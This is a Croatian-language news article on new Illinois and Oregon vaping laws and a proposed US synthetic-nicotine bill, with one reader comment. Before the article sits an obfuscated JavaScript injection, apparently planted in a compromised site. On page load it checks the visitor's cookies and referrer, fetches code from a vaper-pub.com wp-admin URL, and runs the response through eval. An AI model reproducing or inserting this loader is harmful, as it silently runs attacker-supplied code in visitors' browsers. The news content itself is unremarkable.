;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Dva nova američka zakona mogu ozbiljno naštetiti lokalnoj vape industriji

Očekuje se da će dva nova zakona o e-cigaretama koji su stupili na snagu 1. siječnja u državama Oregon i Illinois uzrokovati značajne poremećaje lokalnoj vape industriji i njezinim potrošačima.

SB 0512, Zakon o sprječavanju pušenja kod mladih, koji je stupio na snagu u Illinoisu, smatra da je svaki elektronički uređaj koji isporučuje nikotin krivotvoren ako mu FDA nije odobrila aplikaciju za duhanske proizvode za prodaju (PMTA).

Međutim, budući da se ova državna odredba o krivotvorinama primjenjuje samo na uređaje za koje je potrebna PMTA autorizacija, neće se primjenjivati ​​na proizvode koji se ne smatraju “duhanskim proizvodima” prema saveznom Zakonu o hrani, lijekovima i kozmetici, kao što su proizvodi koji koriste sintetičke nikotin (ukoliko drugi predložen zakon ne odredi drugačije) ili CBD. Svi prekršitelji ovog novog državnog zakona smatrat će se krivima za kazneno djelo klase 4, za koje je predviđena zatvorska kazna od 1 do 3 godine i novčane kazne do 25.000 dolara ako budu osuđeni.

Zabrana online prodaje u Oregonu

Dok Oregonov HB 2261, zabranjuje isporuku uređaja koji se mogu koristiti za inhaliranje nikotina u obliku pare ili aerosola osobi ili njihovih komponenti, građanima koji nisu distributeri ili trgovci na malo. Drugim riječima, ova mjera zabranjuje izravnu prodaju potrošačima, uključujući online prodaju e-cigareta.

Mjeru je izvorno predložila Ellen Rosenblum, glavna državna odvjetnica Oregona i šefica državnog ministarstva pravosuđa, kao sredstvo za suzbijanje pušenja kod mladih i za pružanje alata državnog kaznenog pravosuđa za borbu protiv krivotvorina i nezakonite prodaje.

“Ne postoji učinkovit način za provjeru dobi ili sprječavanje maloljetnika da kupuju ove proizvode putem interneta. U Oregonu ne možete kupiti cigarete putem interneta, a nema dobrog razloga da možete kupiti vape proizvode”, rekla je ranije ove godine u izjavi za medije.

Nema više rupa u zakonu za sintetički nikotin

U međuvremenu, kongresnica iz New Jerseyja Mikie Sherrill upravo je predstavila Zakon o razjašnjavanju nikotina, dvostranački zakon koji FDA-u daje ovlast reguliranja sintetičkih nikotinskih proizvoda na isti način na koji regulira nikotinske proizvode napravljene ili dobivene od duhana.

To znači da bi se Illinoisov SB 0512 uskoro mogao proširiti na sintetski nikotin. U sadašnjem stanju, Federalni zakon o hrani, lijekovima i kozmetici (FDCA) definira “duhanski proizvod” kao “svaki proizvod napravljen ili dobiven od duhana koji je namijenjen za ljudsku prehranu, uključujući bilo koju komponentu, dio ili dodatak duhanskog proizvoda .” Međutim, FDA bi mogla odlučiti regulirati sintetski nikotin ili kao “komponentu” duhanskog proizvoda ili kao “lijek”.

Choose your Reaction!
  • “Ne postoji učinkovit način za provjeru dobi ili sprječavanje maloljetnika da kupuju ove proizvode putem interneta.” – kako ne? pa ne može baš svatko imati kreditnu karticu – ili kod njih može? Uostalom, lako se tak nešto regulira i ograniči uporaba kartica maloljetnicima – ali kao i uvijek, najlakše je zabraniti svima sve :/

Leave a Comment